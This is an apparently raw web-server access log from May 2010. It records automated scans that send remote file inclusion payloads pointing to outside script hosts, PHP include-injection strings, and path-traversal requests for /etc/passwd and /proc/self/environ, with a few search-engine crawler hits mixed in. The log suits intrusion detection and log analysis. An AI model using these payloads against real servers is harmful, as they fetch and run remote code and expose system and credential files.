207.45.185.154 - - [23/May/2010:07:40:40 -0500] "GET /logs/access_log.1271462400/plugins/wp-table/js/wptable-button.phpp?wpPATH=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
207.45.185.154 - - [23/May/2010:07:40:40 -0500] "GET /logs/plugins/wp-table/js/wptable-button.phpp?wpPATH=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
207.45.185.154 - - [23/May/2010:07:40:40 -0500] "GET /plugins/wp-table/js/wptable-button.phpp?wpPATH=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
207.45.185.154 - - [23/May/2010:07:40:40 -0500] "GET /logs/access_log.1271462400/plugins/wp-table/js/wptable-button.phpp?wpPATH=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
174.133.201.194 - - [23/May/2010:07:40:44 -0500] "GET /logs/access_log.1273363200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.covingtons.org/fx29id.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
174.133.201.194 - - [23/May/2010:07:40:45 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.covingtons.org/fx29id.txt???? HTTP/1.1" 404 297 "-""Mozilla/5.0"
174.133.201.194 - - [23/May/2010:07:40:45 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.covingtons.org/fx29id.txt???? HTTP/1.1" 404 302 "-""Mozilla/5.0"
174.133.201.194 - - [23/May/2010:07:40:50 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.covingtons.org/fx29id.txt???? HTTP/1.1" 404 297 "-""Mozilla/5.0"
174.133.201.194 - - [23/May/2010:07:40:50 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.covingtons.org/fx29id.txt???? HTTP/1.1" 404 302 "-""Mozilla/5.0"
174.133.201.194 - - [23/May/2010:07:40:51 -0500] "GET /logs/access_log.1273363200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.covingtons.org/fx29id.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
174.133.201.194 - - [23/May/2010:07:41:02 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.covingtons.org/fx29id.txt???? HTTP/1.1" 404 297 "-""Mozilla/5.0"
174.133.201.194 - - [23/May/2010:07:41:02 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.covingtons.org/fx29id.txt???? HTTP/1.1" 404 302 "-""Mozilla/5.0"
174.133.201.194 - - [23/May/2010:07:41:02 -0500] "GET /logs/access_log.1273363200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.covingtons.org/fx29id.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
174.133.201.194 - - [23/May/2010:07:41:26 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.covingtons.org/fx29id.txt???? HTTP/1.1" 404 297 "-""Mozilla/5.0"
174.133.201.194 - - [23/May/2010:07:41:26 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.covingtons.org/fx29id.txt???? HTTP/1.1" 404 302 "-""Mozilla/5.0"
174.133.201.194 - - [23/May/2010:07:41:27 -0500] "GET /logs/access_log.1273363200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.covingtons.org/fx29id.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
174.133.201.194 - - [23/May/2010:07:41:44 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.covingtons.org/fx29id.txt???? HTTP/1.1" 404 302 "-""Mozilla/5.0"
174.133.201.194 - - [23/May/2010:07:41:44 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.covingtons.org/fx29id.txt???? HTTP/1.1" 404 297 "-""Mozilla/5.0"
174.133.201.194 - - [23/May/2010:07:41:45 -0500] "GET /logs/access_log.1273363200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.covingtons.org/fx29id.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
80.65.166.74 - - [23/May/2010:07:41:45 -0500] "GET //admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
80.65.166.74 - - [23/May/2010:07:41:45 -0500] "GET /logs/access_log.1273104000%20%20//admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
80.65.166.74 - - [23/May/2010:07:41:45 -0500] "GET /logs//admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
213.251.170.118 - - [23/May/2010:07:41:49 -0500] "GET /logs/access_log.1273017600/port.php?content=http://armcrew.alienweb-irc.net/r0x.txt???? HTTP/1.1" 404 319 "-""libwww-perl/5.808"
213.251.170.118 - - [23/May/2010:07:41:49 -0500] "GET /port.php?content=http://armcrew.alienweb-irc.net/r0x.txt???? HTTP/1.1" 404 292 "-""libwww-perl/5.808"
213.251.170.118 - - [23/May/2010:07:41:49 -0500] "GET /logs/port.php?content=http://armcrew.alienweb-irc.net/r0x.txt???? HTTP/1.1" 404 297 "-""libwww-perl/5.808"
80.65.166.74 - - [23/May/2010:07:41:51 -0500] "GET //admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
80.65.166.74 - - [23/May/2010:07:41:51 -0500] "GET /logs//admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
80.65.166.74 - - [23/May/2010:07:41:51 -0500] "GET /logs/access_log.1273104000//admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
80.65.166.74 - - [23/May/2010:07:41:52 -0500] "GET /logs//admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
80.65.166.74 - - [23/May/2010:07:41:52 -0500] "GET /logs/access_log.1271721600//admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
80.65.166.74 - - [23/May/2010:07:41:53 -0500] "GET //admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
183.89.129.156 - - [23/May/2010:07:41:53 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)"
183.89.129.156 - - [23/May/2010:07:41:54 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)"
183.89.129.156 - - [23/May/2010:07:41:55 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)"
200.61.185.200 - - [23/May/2010:07:42:23 -0500] "GET /logs/access_log.1273363200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
174.133.201.194 - - [23/May/2010:07:44:26 -0500] "GET /logs/access_log.1223683200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.covingtons.org/fx29id.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
174.133.201.194 - - [23/May/2010:07:44:38 -0500] "GET /logs/access_log.1223683200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.covingtons.org/fx29id.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
87.250.255.243 - - [23/May/2010:07:45:03 -0500] "GET /logs/access_log.1213747200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
217.73.226.100 - - [23/May/2010:07:45:15 -0500] "GET //admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
217.73.226.100 - - [23/May/2010:07:45:15 -0500] "GET /logs//admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
217.73.226.100 - - [23/May/2010:07:45:15 -0500] "GET /logs//admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
217.73.226.100 - - [23/May/2010:07:45:15 -0500] "GET /logs/access_log.1273104000//admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
217.73.226.100 - - [23/May/2010:07:45:15 -0500] "GET //admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
217.73.226.100 - - [23/May/2010:07:45:15 -0500] "GET /logs/access_log.1273104000%20%20//admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
217.73.226.100 - - [23/May/2010:07:45:21 -0500] "GET //admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
217.73.226.100 - - [23/May/2010:07:45:21 -0500] "GET /logs//admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
217.73.226.100 - - [23/May/2010:07:45:21 -0500] "GET /logs/access_log.1271721600//admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
200.61.185.200 - - [23/May/2010:07:45:41 -0500] "GET /logs/access_log.1273363200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
80.65.166.74 - - [23/May/2010:07:47:01 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
80.65.166.74 - - [23/May/2010:07:47:01 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
80.65.166.74 - - [23/May/2010:07:47:02 -0500] "GET /logs/access_log.1271721600//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
220.181.7.39 - - [23/May/2010:07:47:47 -0500] "GET /logs/access_log.1273017600 HTTP/1.1" 200 462567 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
64.27.53.238 - - [23/May/2010:07:51:02 -0500] "GET //config/dbutil.bck.php?confdir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 306 "-""Mozilla/5.0"
64.27.53.238 - - [23/May/2010:07:51:02 -0500] "GET /logs/access_log.1271548800//config/dbutil.bck.php?confdir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
64.27.53.238 - - [23/May/2010:07:51:02 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
64.27.53.238 - - [23/May/2010:07:51:07 -0500] "GET //config/dbutil.bck.php?confdir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 306 "-""Mozilla/5.0"
64.27.53.238 - - [23/May/2010:07:51:07 -0500] "GET /logs/access_log.1271548800//config/dbutil.bck.php?confdir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
64.27.53.238 - - [23/May/2010:07:51:07 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
200.61.185.200 - - [23/May/2010:07:54:27 -0500] "GET //include/write.php?dir=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
200.61.185.200 - - [23/May/2010:07:54:35 -0500] "GET /logs/access_log.1271980800//include/write.php?dir=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
200.61.185.200 - - [23/May/2010:07:54:41 -0500] "GET /logs//include/write.php?dir=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
87.106.78.123 - - [23/May/2010:07:54:55 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.806"
87.106.78.123 - - [23/May/2010:07:54:55 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.806"
124.217.229.185 - - [23/May/2010:07:55:39 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:07:55:40 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:07:55:42 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:07:55:43 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:07:55:44 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:07:55:44 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
200.61.185.200 - - [23/May/2010:07:56:07 -0500] "GET /logs/access_log.1223683200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
87.106.78.123 - - [23/May/2010:07:56:48 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.806"
200.61.185.200 - - [23/May/2010:07:57:09 -0500] "GET /logs/access_log.1223683200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
87.106.78.123 - - [23/May/2010:07:57:47 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.806"
87.106.78.123 - - [23/May/2010:07:58:33 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.806"
72.167.140.113 - - [23/May/2010:07:59:12 -0500] "GET /logs//png.php?include_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""libwww-perl/5.834"
72.167.140.113 - - [23/May/2010:07:59:12 -0500] "GET //png.php?include_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-""libwww-perl/5.834"
72.167.140.113 - - [23/May/2010:07:59:21 -0500] "GET //png.php?include_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-""libwww-perl/5.834"
67.195.112.180 - - [23/May/2010:08:00:24 -0500] "GET /logs/access_log.1168387200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
200.61.185.200 - - [23/May/2010:08:00:49 -0500] "GET /logs/access_log.1271548800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
124.217.229.185 - - [23/May/2010:08:01:06 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:01:17 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:01:17 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:01:18 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
200.61.185.200 - - [23/May/2010:08:01:26 -0500] "GET /logs/access_log.1271894400//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
200.61.185.200 - - [23/May/2010:08:01:34 -0500] "GET /logs/access_log.1271894400//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
124.217.229.185 - - [23/May/2010:08:01:40 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:01:41 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
220.194.62.53 - - [23/May/2010:08:01:53 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:01:53 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:01:53 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:01:55 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:01:55 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:01:55 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
207.46.204.186 - - [23/May/2010:08:02:32 -0500] "GET /logs/access_log.1173484800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
124.217.229.185 - - [23/May/2010:08:03:46 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
67.195.112.180 - - [23/May/2010:08:03:48 -0500] "GET /?S=A HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
124.217.229.185 - - [23/May/2010:08:04:28 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:04:32 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
67.195.112.180 - - [23/May/2010:08:04:59 -0500] "GET /tattoo/tattoo1.htm HTTP/1.0" 304 - "http://www.topiccraze.com/topic?topic=tattoos&id=100&prvw;w=_r""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.45.185.154 - - [23/May/2010:08:05:05 -0500] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
207.45.185.154 - - [23/May/2010:08:05:05 -0500] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
207.45.185.154 - - [23/May/2010:08:05:05 -0500] "GET /logs/access_log.1262822400/mygallery/myfunctions/mygallerybrowser.php?myPath=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
207.45.185.154 - - [23/May/2010:08:05:09 -0500] "GET /logs/access_log.1270598400/mygallery/myfunctions/mygallerybrowser.php?myPath=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
207.45.185.154 - - [23/May/2010:08:07:24 -0500] "GET /logs/access_log.1262822400/mygallery/myfunctions/mygallerybrowser.php?myPath=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
207.45.185.154 - - [23/May/2010:08:07:24 -0500] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
207.45.185.154 - - [23/May/2010:08:07:24 -0500] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
207.45.185.154 - - [23/May/2010:08:07:34 -0500] "GET /logs/access_log.1270598400/mygallery/myfunctions/mygallerybrowser.php?myPath=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
80.65.166.74 - - [23/May/2010:08:07:55 -0500] "GET //?dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
80.65.166.74 - - [23/May/2010:08:07:55 -0500] "GET /logs//?dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 200 6659 "-""Mozilla/5.0"
80.65.166.74 - - [23/May/2010:08:07:56 -0500] "GET /logs/access_log.1270857600//?dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
220.194.62.53 - - [23/May/2010:08:08:14 -0500] "GET /logs/access_log.1273017600/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:08:23 -0500] "GET /logs/access_log.1273017600/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
80.65.166.74 - - [23/May/2010:08:08:27 -0500] "GET /logs/access_log.1263081600//?dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
220.194.62.53 - - [23/May/2010:08:09:59 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:09:59 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:09:59 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.250.255.243 - - [23/May/2010:08:10:11 -0500] "GET /logs/access_log.1253404800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
188.40.137.140 - - [23/May/2010:08:10:47 -0500] "GET /logs/xmlrcp.php HTTP/1.1" 404 299 "-""libwww-perl/5.813"
188.40.137.140 - - [23/May/2010:08:10:49 -0500] "GET /xmlrcp.php HTTP/1.1" 404 294 "-""libwww-perl/5.813"
87.106.78.123 - - [23/May/2010:08:13:54 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.806"
72.167.140.113 - - [23/May/2010:08:13:57 -0500] "GET /logs/access_log.1273363200//png.php?include_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 319 "-""libwww-perl/5.834"
72.167.140.113 - - [23/May/2010:08:13:57 -0500] "GET //png.php?include_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-""libwww-perl/5.834"
72.167.140.113 - - [23/May/2010:08:13:57 -0500] "GET /logs//png.php?include_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""libwww-perl/5.834"
87.106.78.123 - - [23/May/2010:08:13:57 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.806"
87.106.78.123 - - [23/May/2010:08:13:57 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.806"
67.195.112.180 - - [23/May/2010:08:14:09 -0500] "GET /logs/access_log.1231027200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
